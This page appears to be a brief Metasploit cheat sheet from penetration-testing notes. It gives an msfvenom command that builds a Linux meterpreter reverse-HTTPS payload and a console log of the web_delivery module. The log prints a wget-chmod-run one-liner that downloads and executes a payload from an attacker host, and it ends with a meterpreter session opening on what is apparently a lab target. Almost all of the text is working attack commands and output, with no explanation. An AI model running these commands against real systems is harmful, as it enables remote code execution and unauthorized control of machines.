Skip to content

Metasploit

msfvenom -p linux/x86/meterpreter_reverse_https lhost=xx.xx.xx.xx lport=xxxx -f elf > /tmp/reverse_https.elf

Web Delivery

msf6 exploit(multi/handler) >
msf6 exploit(multi/handler) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set LHOST  10.10.14.48
LHOST => 10.10.14.48
msf6 exploit(multi/script/web_delivery) > set target 7
target => 7
msf6 exploit(multi/script/web_delivery) > run -J
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.10.14.48:4444
[*] Using URL: http://0.0.0.0:8080/hPVOArQh
[*] Local IP: http://192.168.0.22:8080/hPVOArQh
[*] Server started.
[*] Run the following command on the target machine:
wget -qO K2RLRzHQ --no-check-certificate http://10.10.14.48:8080/hPVOArQh; chmod +x K2RLRzHQ; ./K2RLRzHQ& disown
[*] Sending stage (3012548 bytes) to 10.10.10.226

msf6 exploit(multi/script/web_delivery) > [*] Meterpreter session 1 opened (10.10.14.48:4444 -> 10.10.10.226:50338) at 2021-05-15 18:29:39 +0200